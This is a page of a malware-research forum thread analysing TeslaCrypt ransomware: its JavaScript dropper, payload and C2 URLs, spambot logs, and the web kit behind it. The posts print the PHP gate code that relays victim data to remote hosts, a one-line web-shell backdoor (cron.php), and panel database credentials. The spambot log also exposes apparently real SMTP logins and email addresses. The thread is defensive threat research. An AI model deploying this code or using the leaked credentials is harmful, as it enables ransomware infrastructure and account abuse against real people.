TeslaCrypt ransomware - Page 5

Re: Malware collection

#27826 by ikolor
Sat Feb 06, 2016 4:37 pm

next

https://www.virustotal.com/en/file/3783 ... 454776380/

Attachments

invoice_A5twhy.xls.rar

(1.66 KiB) Downloaded 61 times

Username

ikolor

Posts

342

Joined

Thu Jun 05, 2014 2:20 pm

Location

Poland

Re: Malware collection

#27827 by sysopfb
Sat Feb 06, 2016 5:52 pm

ikolor wrote:next

https://www.virustotal.com/en/file/3783 ... 454776380/

It's a javascript downloader.

That one downloads one of the following which is probably teslacrypt

Code: Select all

hxxp://helloguysqq.su/80.exe
hxxp://sowhatsupwithitff.com/80.exe

There's a shitload of them at 78.47.198.134/go_attach/
Which is where a Spamm panel is sitting

Username

sysopfb

Posts

97

Joined

Thu Oct 23, 2014 1:22 am

Contact

Re: TeslaCrypt ransomware

#27834 by benkow_
Sun Feb 07, 2016 7:34 pm

Teslacrypt spammer

http://cybercrime-tracker.net/index.php ... 47.198.134 -> spammer panel.

Code: Select all

http://78.47.198.134/1.exe

spammer bot: https://www.virustotal.com/fr/file/6aa5 ... /analysis/
This bot seems to retrives informations from:

Code: Select all

(direcotry listing allowed)
http://78.47.198.134/go_mails/*****.txt -> Emails to spam
http://78.47.198.134/header/name.txt -> fake info for email crafting
http://78.47.198.134/go_attach/*****.zip -> payloads (teslacrypt dropper (JS)

the bot write some logs:

Code: Select all

[01:43:43:774] - Server address : http://78.47.198.134/
[01:43:44:825] - Status posted : 0
[01:43:47:569] - Received : 3
16
smtp.netvigator.com@joecat@netvigator.com:d30857	out.alice.it@casa886@alice.it:casa86	smtp.ibatistabetel.org.br@recepcao@ibatistabetel.org.br:recepcao123	smtp.wanadoo.fr@delfin.sim@wanadoo.fr:rosefm	smtp.poczta.onet.pl@katarzyna.kosinska@onet.pl:didl12	
http://78.47.198.134/go_mails/botid-1073_1222.txt
http://78.47.198.134/header/name.txt
http://78.47.198.134/go_attach/invoice_A5twhy.zip
[ID:7680938-8849].zip
Microsoft Outlook Express {1|2|3}

1000
[ID:803801] To compensate for the inconvenience caused a partial refund is applied.
This is our payment for the last unpaid purchase. Attached below you will find additional information.
[01:43:47:569] - Spam cmd
[01:43:47:569] - Spam : servers (first 5 lines, total - 6) :
[01:43:47:569] -     smtp.netvigator.com@joecat@netvigator.com:d30857
[01:43:47:569] -     out.alice.it@casa886@alice.it:casa86
[01:43:47:569] -     smtp.ibatistabetel.org.br@recepcao@ibatistabetel.org.br:recepcao123
[01:43:47:569] -     smtp.wanadoo.fr@delfin.sim@wanadoo.fr:rosefm
[01:43:47:569] -     smtp.poczta.onet.pl@katarzyna.kosinska@onet.pl:didl12
[01:43:47:799] - Spam : emails (first 5 lines, total - 5000) :
[01:43:47:799] -     buffalowings37@yahoo.com
[01:43:47:799] -     buffalowings48@yahoo.com
[01:43:47:799] -     buffalowinter61@hotmail.com
[01:43:47:799] -     buffalowinter@gmail.com
[01:43:47:799] -     buffalowjoe@netzero.net
[01:43:47:990] - Spam : mailfrom (first 5 lines, total - 4612) :
[01:43:47:990] -     Charyl	Tady
[01:43:47:990] -     Julita	Harp
[01:43:47:990] -     Dara	Schutt
[01:43:47:990] -     Andi	Lopez
[01:43:47:990] -     Sherman	Casias
[01:43:48:130] - Status posted : 3
[01:43:48:130] - Spam : start
[01:43:48:190] - Spam (3888) : srv (1) : smtp.netvigator.com@joecat@netvigator.com:d30857
[01:43:48:200] - Spam (3900) : srv (2) : smtp.netvigator.com@joecat@netvigator.com:d30857
[01:43:48:200] - Spam (3864) : srv (3) : smtp.netvigator.com@joecat@netvigator.com:d30857
[01:43:48:210] - Spam (3876) : srv (1) : out.alice.it@casa886@alice.it:casa86
[01:43:48:220] - Spam (3904) : srv (2) : out.alice.it@casa886@alice.it:casa86
[01:43:48:220] - Spam (3916) : srv (3) : out.alice.it@casa886@alice.it:casa86
[01:43:48:230] - Spam (3920) : srv (1) : smtp.ibatistabetel.org.br@recepcao@ibatistabetel.org.br:recepcao123
[01:43:48:230] - Spam (3912) : srv (2) : smtp.ibatistabetel.org.br@recepcao@ibatistabetel.org.br:recepcao123
[01:43:48:250] - Spam (3932) : srv (3) : smtp.ibatistabetel.org.br@recepcao@ibatistabetel.org.br:recepcao123
[01:43:48:250] - Spam (3896) : srv (1) : smtp.wanadoo.fr@delfin.sim@wanadoo.fr:rosefm
[01:43:48:270] - Spam (3936) : srv (2) : smtp.wanadoo.fr@delfin.sim@wanadoo.fr:rosefm
etc ...

JS Dropper: https://www.virustotal.com/fr/file/e746 ... /analysis/
Teslacrypt sample: https://www.virustotal.com/fr/file/4519 ... /analysis/

spambot + some JS dropper + Teslacrypt sample attached

Attachments

spambot.zip

infected
(361.15 KiB) Downloaded 111 times

Username

benkow_

Posts

85

Joined

Sat Jan 24, 2015 12:14 pm

Re: TeslaCrypt ransomware

#27836 by sysopfb
Sun Feb 07, 2016 10:42 pm

The spam panel being used is called Spamm Panel

There is a demo up at htxp://spmsmtcheckrgb.com/index.php

Username

sysopfb

Posts

97

Joined

Thu Oct 23, 2014 1:22 am

Contact

Re: TeslaCrypt ransomware

#27952 by benkow_
Sun Feb 28, 2016 7:33 pm

I'm working on web part of ransomware.
So, TeslaCrypt gate (mzsys.php/dbsys.php/bstr.php etc):

Code: Select all

<?php
$network = ip2long("23.96.0.0");
$mask = ip2long("255.248.0.0");
$remote = ip2long($_SERVER['REMOTE_ADDR']);

if (($remote & $mask) == $network)
    {
    header("Location: http://google.com");
    exit;
    }

set_time_limit(300);

if (!isset($_POST['data']))
    {
    die("empty post");
    }

$post = array(
    'data' => $_POST['data'],
    'IP' => $_SERVER['REMOTE_ADDR'],
    'SHELL' => $_SERVER['SERVER_NAME'],
);
$gate = array(
    "http://perc54hg47fhnkjnfvcdgvdc.clinkjuno.com/ing.php",
    "http://yy46bdff329hfbcjhbme2f.evertmazic.com/ing.php",
    "http://dd7bsndhr45nfksdnkferfer.javakale.at/ing.php",
);
$fp = fopen("most.txt", "a+");
fwrite($fp, 'data=' . $_POST['data'] . ' IP=' . $_SERVER['REMOTE_ADDR'] . ' SHELL=' . $_SERVER['SERVER_NAME'] . "\n");
fclose($fp);

foreach($gate as $value)
    {
    $process = curl_init();
    curl_setopt($process, CURLOPT_URL, $value);
    curl_setopt($process, CURLOPT_POST, 1);
    curl_setopt($process, CURLOPT_POSTFIELDS, $post);
    curl_setopt($process, CURLOPT_RETURNTRANSFER, true);
    if (!$result = curl_exec($process))
        {
        continue;
        }

    if (stristr($result, "work:"))
        {
        echo $result;
        curl_close($process);
        die();
        }

    if (stristr($result, "INSERTED"))
        {
        echo $result;
        curl_close($process);
        die();
        }

    curl_close($process);
    } ?>

Username

benkow_

Posts

85

Joined

Sat Jan 24, 2015 12:14 pm

Re: TeslaCrypt ransomware

#27965 by benkow_
Mon Feb 29, 2016 6:48 pm

Here we go,
web kit of TeslaCrypt:
On each Teslacrypt callback ex: http://XXXXX.com/csys.php you can find:
csys.php -> gate:

Code: Select all

    <?php
    $network=ip2long("23.96.0.0");
    $mask=ip2long("255.248.0.0");
    $remote=ip2long($_SERVER['REMOTE_ADDR']);
    if (($remote & $mask)==$network){
        header("Location: http://google.com");
        exit;
    }
    if(!isset($_POST['data'])){        die("empty post");     }
    $post = array('data'=>$_POST['data'], 'IP'=>$_SERVER['REMOTE_ADDR'], 'SHELL'=>$_SERVER['SERVER_NAME'],);

    $gate = array(

        "http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/ing.php",
        "http://ert54nfh6hdshbw4f.nursespelk.com/ing.php",
        "http://kk4dshfjn45tsnkdf34fg.tatiejava.at/ing.php",
        "http://nn54djhfnrnm4dnjnerfsd.replylaten.at/ing.php",
    );                                                                                                                                                                                                        $fp = fopen("images/most47.txt", "a+");    fwrite($fp, 'data='.$_POST['data'].' IP='.$_SERVER['REMOTE_ADDR'].' SHELL='.$_SERVER['SERVER_NAME']."\n");    fclose($fp);


    foreach( $gate as $value ) 
    {
        $process = curl_init();
        curl_setopt($process, CURLOPT_URL, $value);
        curl_setopt($process, CURLOPT_POST, 1);
        curl_setopt($process, CURLOPT_POSTFIELDS,$post);
        curl_setopt($process, CURLOPT_RETURNTRANSFER, true);
        if( ! $result = curl_exec($process)) {
            continue;
        }
         if(stristr($result,"work:")){
                echo $result;
                curl_close($process);
                die();
        }
        if(stristr($result,"INSERTED")){
                echo $result;
                curl_close($process);
                die();
        }
        curl_close($process);
    }
    ?>

a file cron.php:

Code: Select all


     <?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>

Username

benkow_

Posts

85

Joined

Sat Jan 24, 2015 12:14 pm

Re: TeslaCrypt ransomware

#27979 by kaze0
Wed Mar 02, 2016 12:11 pm

Btw the spamming bot is also called Bruteres aka Trubsil aka Fidobot. It was used by Dridex to send Dridex spam back in October 2015.

Username

kaze0

Posts

3

Joined

Wed Mar 04, 2015 8:49 am

Re: TeslaCrypt ransomware

#27980 by benkow_
Wed Mar 02, 2016 2:00 pm

kaze0 wrote:Btw the spamming bot is also called Bruteres aka Trubsil aka Fidobot. It was used by Dridex to send Dridex spam back in October 2015.

Thx for the tips. I've call it Bombila because of the word a the top left of the admin panel: бомбила

and the creds of the panel:

Code: Select all

$mysql['user'] = 'bombila';
$mysql['pass'] = 'bombila';
$mysql['db'] = 'bombila';

Username

benkow_

Posts

85

Joined

Sat Jan 24, 2015 12:14 pm

Re: Malware collection

#27981 by ikolor
Wed Mar 02, 2016 4:46 pm

next ..

https://www.virustotal.com/en/file/2d54 ... 456936883/

Attachments

virus.rar

(1.16 MiB) Downloaded 88 times

Username

ikolor

Posts

342

Joined

Thu Jun 05, 2014 2:20 pm

Location

Poland

Re: Malware collection

#27982 by benkow_
Wed Mar 02, 2016 4:49 pm

ikolor wrote:next ..

https://www.virustotal.com/en/file/2d54 ... 456936883/

It's TeslaCrypt 3.0

Username

benkow_

Posts

85

Joined

Sat Jan 24, 2015 12:14 pm